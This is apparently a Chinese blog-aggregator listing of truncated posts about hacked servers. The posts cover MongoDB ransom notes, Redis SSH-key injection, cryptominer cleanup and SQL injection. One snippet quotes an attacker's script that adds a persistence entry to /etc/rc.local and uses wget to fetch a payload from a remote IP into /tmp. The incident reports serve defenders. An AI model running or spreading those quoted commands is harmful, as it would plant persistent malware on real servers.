今天上午(2017年1月7日),我的微信群中同时出现了两个MongoDB被黑掉要赎金的情况,于是在调查过程中,发现了这个事件。这个事件应该是2017年开年的第一次比较大的安全事件吧,发现国内居然没有什么报道,国内安全圈也没有什么动静(当然,他们也许知道,只是不想说吧),Anyway,让我这个非安全领 ...
分类:
数据库 时间:
2017-01-10 09:27:27
阅读次数:
862
{ "_id" : ObjectId("58706f5caff9bd76f4180c30"), "Info" : "Your DB is Backed up at our servers, to restore send 0.1 BTC to the Bitcoin Address then sen ...
分类:
数据库 时间:
2017-01-07 18:08:03
阅读次数:
398
top -c 查到cpu的占用率最高的进程 取消这些命令的可执行权限,然后kill -9 掉 ...
分类:
其他好文 时间:
2017-01-04 00:03:58
阅读次数:
206
#1183 : 连通性一·割边与割点 #1183 : 连通性一·割边与割点 时间限制:10000ms 单点时限:1000ms 内存限制:256MB 描述 还记得上次小Hi和小Ho学校被黑客攻击的事情么,那一次攻击最后造成了学校网络数据的丢失。为了避免再次出现这样的情况,学校决定对校园网络进行重新设计 ...
分类:
其他好文 时间:
2016-12-18 18:01:06
阅读次数:
317
参考链接:https://www.sebug.net/vuldb/ssvid-89715攻击者在未授权访问Redis的情况下可以利用Redis的相关方法,可以成功将自己的公钥写入目标服务器的/root/.ssh文件夹的authotrized_keys文件中,进而可以直接登录目标服务器。环境:KaLi:192.168.2.162CentOS:192.168.2.32C..
分类:
其他好文 时间:
2016-12-08 00:03:11
阅读次数:
206
C#中用基本的方法对数据库进行增删改查,会被黑客利用,写入其他的代码以实现对数据库的数据进行其他的操作。例如: 对下列数据库的某个信息进行修改操作 修改代码: using System; using System.Collections.Generic; using System.Linq; usi ...
分类:
数据库 时间:
2016-11-30 04:07:33
阅读次数:
244
Ubuntu服务器被黑经历(ElastichSearch漏洞) 起因 最近我们的一台Ubuntu阿里云服务器一直提示有肉鸡行为,提示了好几天,开始并没有关注,然后连续几天后发现应该是个大问题啊。很可能服务被侵入了!!! 寻找线索 一开始我是完全懵逼的状态的,Linux不是很熟悉,只会简单的命令,安装 ...
分类:
其他好文 时间:
2016-11-15 19:31:32
阅读次数:
174
阿里云上报警提示有异地IP登陆,上去之后发现服务器被黑了。以下是处理过程:木马排查1,首先top发现有minerd对CPU的占有达到了100%,此前这台服务器上是没有跑任何应用的,直觉告诉我minerd有问题哦[root@ll_sas01~/.ssh]#psaux|grepminerdroot717499.60.12395045400?SLsl15:08..
分类:
其他好文 时间:
2016-10-27 02:03:05
阅读次数:
211
今天接到短信 阿里云Linux服务器被黑 脚本写的也挺容易看懂的: echo "sh /etc/chongfu.sh &" >> /etc/rc.local : 开机自启动自动下载 ./wget -P /tmp/ http://61.147.198.172/zsqs &> /dev/null Cen ...
分类:
系统相关 时间:
2016-10-27 01:38:14
阅读次数:
269
前言:昨晚上我看到一篇因为apple ID 被盗,被迫向骗子支付了1000多元的文章,看完后,觉得如今真的不能在网络上留下自己太多的个人信息,尤其是涉及个人隐私、财产的信息,能避免尽量避免,要不然稍不注意就会被黑客利用。 文章中的黑客不仅改了他的密码,而且也把他账号的密保和邮箱篡改了,PO主就没办法 ...
分类:
其他好文 时间:
2016-10-19 01:38:56
阅读次数:
429
